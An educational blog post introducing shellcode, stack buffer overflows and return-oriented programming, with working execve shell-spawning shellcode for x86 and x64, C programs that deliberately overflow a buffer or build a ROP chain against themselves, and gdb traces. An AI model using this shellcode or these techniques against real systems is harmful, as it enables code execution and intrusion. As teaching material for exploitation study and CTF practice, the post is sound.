Introduction
This post gives a brief introduction to shellcode, stack buffer overflows, and return-oriented programming (ROP).
Shellcode
Shellcode usually refers to a short sequence of machine code that spawns a shell for the attacker. Below is one example for x86 and one for x64 [1][2].
// gcc -fno-stack-protector -z execstack shellx86.c -o shellx86 -no-pie -m32
unsigned char code[] = "\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

int main()
{
    // Treat the byte array as a function and call it.
    int (*ret)() = (int (*)())code;
    ret();
}

// gcc -fno-stack-protector -z execstack shellx64.c -o shellx64 -no-pie
unsigned char code[] = "\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";

int main()
{
    // Treat the byte array as a function and call it.
    int (*ret)() = (int (*)())code;
    ret();
}
To show how these two shellcodes work, we disassemble them in gdb and inspect the registers right before the system call.
For the x86 shellcode:
0x804a018 <code>:      xor    %eax,%eax
0x804a01a <code+2>:    cltd
0x804a01b <code+3>:    push   %eax
0x804a01c <code+4>:    push   $0x68732f2f
0x804a021 <code+9>:    push   $0x6e69622f
0x804a026 <code+14>:   mov    %esp,%ebx
0x804a028 <code+16>:   push   %eax
0x804a029 <code+17>:   push   %ebx
0x804a02a <code+18>:   mov    %esp,%ecx
0x804a02c <code+20>:   mov    $0xb,%al
0x804a02e <code+22>:   int    $0x80

Breakpoint 2, 0x0804a02e in code ()
(gdb) p/x $eax
$1 = 0xb
(gdb) p/x $ebx
$2 = 0xffffd2d0
(gdb) x/s $ebx
0xffffd2d0:     "/bin//sh"
(gdb) p/x $ecx
$3 = 0xffffd2c8
(gdb) x/4wx $ecx
0xffffd2c8:     0xffffd2d0      0x00000000      0x6e69622f      0x68732f2f
(gdb) p/x $edx
$4 = 0x0
At 0x804a02e, just before the int $0x80 system call, $eax holds the syscall number for execve (0xb), $ebx points to the string "/bin//sh", $ecx points to the argument vector (a pointer to that string followed by NULL), and $edx, the environment pointer, is 0.
For the x64 shellcode:
0x601030 <code>:      mul    %esi
0x601032 <code+2>:    push   %rdx
0x601033 <code+3>:    movabs $0x68732f2f6e69622f,%rbx
0x60103d <code+13>:   push   %rbx
0x60103e <code+14>:   lea    (%rsp),%rdi
0x601042 <code+18>:   mov    $0x3b,%al
0x601044 <code+20>:   syscall

Breakpoint 2, 0x0000000000601044 in code ()
(gdb) p/x $rax
$1 = 0x3b
(gdb) p/x $rdi
$2 = 0x7fffffffe148
(gdb) x/s $rdi
0x7fffffffe148: "/bin//sh"
(gdb) p/x $rsi
$3 = 0x7fffffffe258
(gdb) x/2gx $rsi
0x7fffffffe258: 0x00007fffffffe53f      0x0000000000000000
(gdb) p/x $rdx
$4 = 0x0
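At 0x601044, just before the syscall instruction, $rax holds the syscall number for execve (0x3b), $rdi points to the string "/bin//sh", $rsi points to the argument vector, and $rdx, the environment pointer, is 0. Note that the shellcode never sets $rsi itself; the value seen here is left over from the caller and appears to be main's own argv.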
Stack buffer overflow
A stack buffer overflow is typically used to overwrite the return address saved on the stack.
// gcc bof.c -o bof -no-pie -z execstack
// (add -fno-stack-protector if your gcc enables stack canaries by default)
#include <stdio.h>

int main()
{
    unsigned char victim[20];
    unsigned char code[] = "\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\x48\x31\xf6\x48\x31\xd2\xb0\x3b\x0f\x05";

    printf("executable code at %p\n", (void *)code);

    // Split the address of code into bytes, least significant byte first.
    char c1 = (unsigned long)(code) & 0xff;
    char c2 = ((unsigned long)(code) & 0xff00)>>8;
    char c3 = ((unsigned long)(code) & 0xff0000)>>16;
    char c4 = ((unsigned long)(code) & 0xff000000)>>24;
    char c5 = ((unsigned long)(code) & 0xff00000000)>>32;
    char c6 = ((unsigned long)(code) & 0xff0000000000)>>40;

    // Deliberate overflow: victim holds 20 bytes but up to 80 may be written,
    // so the padding and the address run over the saved return address.
    snprintf((char *)victim, 80,
             "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%c%c%c%c%c%c%c%c",
             c1, c2, c3, c4, c5, c6, 0, 0);
    return 0;
}
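The sample above shows how a buffer overflow overwrites the return address on the stack so that execution ends up in the shellcode. Note that the shellcode used here differs slightly from the one in the previous section: it explicitly zeroes $rsi and $rdx (xor %rsi,%rsi; xor %rdx,%rdx) before the syscall, presumably because it can no longer rely on the register values left behind by a caller.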
Return Oriented Programming
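Return-oriented programming (ROP) is a code-reuse attack technique: instead of injecting new code, the attacker chains together short instruction sequences ("gadgets") that already exist in executable memory, each ending in a ret.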
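// gcc rop.c -o rop -no-pie
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>

int main()
{
    int rv;
    unsigned long victim[1];
    unsigned long *gadget = malloc(0x4000);

    printf("gadget address: %p\n", (void *)gadget);

    // Make the first heap page executable so it can hold the gadgets.
    // The -0x10 assumes the chunk starts 0x10 bytes into a page.
    rv = mprotect((char *)gadget - 0x10, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
    if (rv < 0) {
        perror("mprotect");
    }

    unsigned long base = (unsigned long)gadget;

    // Simulated overflow: out-of-bounds writes past victim.
    victim[5] = base;           // return address -> pivot gadget
    victim[6] = base + 0x1000;  // popped into rsp by the pivot gadget

    // Gadgets, one per 8-byte slot, stored as little-endian machine code.
    gadget[0] = 0xc35c;  // pop rsp; ret
    gadget[1] = 0xc35f;  // pop rdi; ret
    gadget[2] = 0xc35e;  // pop rsi; ret
    gadget[3] = 0xc35a;  // pop rdx; ret
    gadget[4] = 0xc358;  // pop rax; ret
    gadget[5] = 0x050f;  // syscall

    // Fake stack at base + 0x1000.
    gadget[0x200] = base + 8;
    gadget[0x201] = base + 0x2000; //rdi
    gadget[0x202] = base + 0x10;
    gadget[0x203] = 0; //rsi
    gadget[0x204] = base + 0x18;
    gadget[0x205] = 0; //rdx
    gadget[0x206] = base + 0x20;
    gadget[0x207] = 0x3b; //rax
    gadget[0x208] = base + 0x28;

    // "/bin//sh" at base + 0x2000.
    gadget[0x400] = 0x68732f2f6e69622f;
    return 0;
}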
To make the chain easier to follow, here are the registers and the memory layout at the time of the syscall.
(gdb) p/x $rax
$1 = 0x3b
(gdb) p/x $rdi
$2 = 0x604010
(gdb) x/s $rdi
0x604010:       "/bin//sh"
(gdb) p/x $rsi
$3 = 0x0
(gdb) p/x $rdx
$4 = 0x0
(gdb) x/10gx 0x603010
0x603010:       0x0000000000602018      0x0000000000604010
0x603020:       0x0000000000602020      0x0000000000000000
0x603030:       0x0000000000602028      0x0000000000000000
0x603040:       0x0000000000602030      0x000000000000003b
0x603050:       0x0000000000602038      0x0000000000000000
(gdb) x/2i 0x602010
   0x602010:    pop    %rsp
   0x602011:    retq
(gdb) x/2i 0x602018
   0x602018:    pop    %rdi
   0x602019:    retq
(gdb) x/2i 0x602020
   0x602020:    pop    %rsi
   0x602021:    retq
(gdb) x/2i 0x602028
   0x602028:    pop    %rdx
   0x602029:    retq
(gdb) x/2i 0x602030
   0x602030:    pop    %rax
   0x602031:    retq
(gdb) x/i 0x602038
=> 0x602038:    syscall
In the sample code, the buffer overflow is simulated by directly overwriting the return address with 0x602010.
The gadget pop rsp; ret at that address works as a pivot gadget that changes rsp to 0x603010. The memory at 0x603010 is crafted as a fake stack that chains the remaining ROP gadgets.
There are six ROP gadgets in total: the pivot gadget at 0x602010, four load gadgets at 0x602018, 0x602020, 0x602028, and 0x602030 that each pop a value into the desired register, and the gadget at 0x602038, which triggers the syscall.
In practice, gadgets have to be found in the target binary, and the available ones are rarely as simple as those in this sample.
Conclusion
This post gave a brief introduction to shellcode, stack buffer overflows, and ROP, and showed how they can be combined to obtain a shell. Real CTF challenges are rarely as simple as the examples here: they may require alphanumeric shellcode, or add defenses such as a shadow stack or simple control-flow integrity (CFI).
References
[1] https://www.exploit-db.com/exploits/42428/
[2] https://www.exploit-db.com/exploits/38239/